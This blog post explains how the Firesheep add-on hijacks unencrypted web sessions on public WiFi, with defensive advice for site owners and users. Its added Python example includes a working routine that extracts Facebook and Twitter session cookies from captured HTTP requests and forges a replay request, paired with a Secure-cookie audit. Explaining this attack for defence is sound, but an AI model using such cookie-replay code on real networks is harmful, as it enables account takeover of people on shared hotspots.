Firesheep allows you to easily capture Facebook and other unencrypted sessions on public hotspots.
This week, Seattle-based developer Eric Butler made available for download a pre-release version of a provocative add-on for Mozilla's Firefox web browser. He calls it Firesheep, and it allows its user to easily hijack the unencrypted web sessions of anyone on the same network segment. All users of open public WiFi hotspots (such as at Starbucks) are vulnerable, because every frame on an open hotspot can be read by anyone else in range, any time they are using an unencrypted protocol such as plain http. Mr. Butler has posted a well-written explanation of what Firesheep does.
Firesheep uses session hijacking.
This means that I would be vulnerable when using Hotmail or Yahoo Mail: they encrypt the username/password dialog (using https), but then use http for reading the mailbox, so the session cookie that proves I'm logged in travels in the clear with every page request. Acck! Gmail uses https (Hypertext Transfer Protocol Secure) for the entire session (the default since January 2010, as long as the "Always use https" setting is left on), so Gmail users will remain secure from Firesheep session hijacking.
Use caution on public WiFi hotspots.
The Firesheep add-on shows you a list of the people on your hotspot whose sessions it has captured, along with the site each one is logged in to (Facebook, MySpace, Twitter and others). Double-click on a name and you'll see information about that user, including his/her picture for social networking sites. You are now, together with the target user, logged in to the target's Facebook/MySpace/etc session, with no password needed; you have hijacked that user's session.
This works because many sites use https only for the login page, then switch to http and hand the browser a session cookie to identify you. Because that cookie is not marked as https-only (the "Secure" cookie attribute), the browser sends it in the clear on every subsequent http request. Firesheep reads the cookie off the air, saves a copy, and presents it in its own requests to masquerade as the target user, for as long as the session remains valid.
This will force responsible website owners who handle personal information to encrypt the entire session from end to end, including the cookies: serve every page over https and mark the session cookie Secure so the browser never sends it over http. In that respect, this is a good thing. Until then, don't use public WiFi hotspots for anything personal unless you use them only to carry encrypted traffic over your company's VPN. Also, the same vulnerability exists for your iPhone and other smartphones whenever they are on the same WiFi hotspot. Now that the cat is out of the bag, I'm sure that Hotmail, Facebook, Dropbox, et al will quickly respond by encrypting everything.
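To make the two halves of this concrete, here is an added Python example, written for this post and not taken from Firesheep or from any site's code. The first half does what a Firesheep-style sniffer does with one cleartext http request: read the Host and Cookie headers and keep the cookies that together identify a login session, then build the replay request. The second half is the site owner's check: inspect a Set-Cookie header and flag a session cookie that lacks the Secure attribute. The site list, cookie names and header values are constructed for illustration and are assumptions, not Firesheep's real handler list or any site's real cookies.

```python
# Constructed site "handlers": which cookies together identify a login session
# on each host. The names are illustrative assumptions, not Firesheep's list.
SESSION_COOKIES = {
    "www.facebook.com": {"c_user", "xs"},
    "twitter.com": {"_twitter_sess", "auth_token"},
}


def parse_http_request(raw: bytes) -> dict:
    """Split one cleartext HTTP/1.x request into request line and headers.
    Header names are lower-cased; duplicate headers are not expected here."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def parse_cookie_header(value: str) -> dict:
    """'a=1; b=2' -> {'a': '1', 'b': '2'}, preserving order."""
    cookies = {}
    for pair in value.split(";"):
        name, sep, val = pair.strip().partition("=")
        if sep:
            cookies[name] = val
    return cookies


def sniff_session(raw_request: bytes):
    """What a Firesheep-style sniffer does with one captured http request:
    read Host and Cookie in the clear and keep the cookies that name a session.
    Returns (host, cookies), or None if no complete session was seen."""
    req = parse_http_request(raw_request)
    host = req["headers"].get("host", "").lower()
    wanted = SESSION_COOKIES.get(host)
    if not wanted or "cookie" not in req["headers"]:
        return None
    jar = parse_cookie_header(req["headers"]["cookie"])
    captured = {k: v for k, v in jar.items() if k in wanted}
    if set(captured) != wanted:          # need every session cookie to replay
        return None
    return host, captured


def forge_request(host: str, cookies: dict, path: str = "/") -> bytes:
    """Replay: the request the attacker sends from his own machine.
    No password is involved; presenting the copied cookies is enough."""
    cookie = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie}\r\nConnection: close\r\n\r\n").encode()


def audit_set_cookie(set_cookie: str) -> list:
    """Site owner's check: a session cookie without the Secure attribute is
    sent by the browser on every http request, where a sniffer can read it.
    Returns a list of problems; empty means the cookie is https-only."""
    attrs = {part.strip().lower() for part in set_cookie.split(";")[1:]}
    problems = []
    if "secure" not in attrs:
        problems.append("missing Secure: browser will send this cookie over plain http")
    return problems


# Constructed sample traffic (all values made up): one request the victim's
# browser sent over plain http after logging in over https.
CAPTURED_REQUEST = (
    b"GET /home.php HTTP/1.1\r\n"
    b"Host: www.facebook.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: datr=not-a-session-cookie; c_user=100001234; xs=1%3Aabc123%3A2%3A1287700000\r\n"
    b"\r\n"
)

# Constructed Set-Cookie headers: the weak form, and the corrected form.
WEAK_SET_COOKIE = "xs=1%3Aabc123%3A2%3A1287700000; path=/; domain=.facebook.com; httponly"
FIXED_SET_COOKIE = "xs=1%3Aabc123%3A2%3A1287700000; path=/; domain=.facebook.com; secure; httponly"

if __name__ == "__main__":
    hijacked = sniff_session(CAPTURED_REQUEST)
    print("captured session:", hijacked)
    print(forge_request(*hijacked, path="/home.php").decode())
    print("weak cookie:", audit_set_cookie(WEAK_SET_COOKIE))
    print("fixed cookie:", audit_set_cookie(FIXED_SET_COOKIE))
```

In real use the request bytes would come off a wireless capture rather than a constant, and the hijacker's browser, not a string, would present the copied cookie. The point the check makes is that marking the cookie Secure alone is not enough if the site still serves pages over http: the browser simply won't send the cookie, and the user is logged out on those pages, which is why the fix has to be https for the whole session.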
Near-term defenses: As a less than perfect defense against session hijacking, if you use the Mozilla Firefox web browser, you can use the Force-TLS add-on (an early implementation of the Strict-Transport-Security header) to force websites to use https, but this works only if each website you visit supports https on every page. (Most, including mine, don't.) A defensive tool with promise is another Firefox add-on named HTTPS Everywhere, by the Electronic Frontier Foundation. Like Force-TLS, it works only for websites that support https; on a site that serves some pages over http only, the cookie still goes out in the clear on those pages.
Visit my website: http://russbellew.com
© Russ Bellew · Fort Lauderdale, Florida, USA · phone 954 873-4695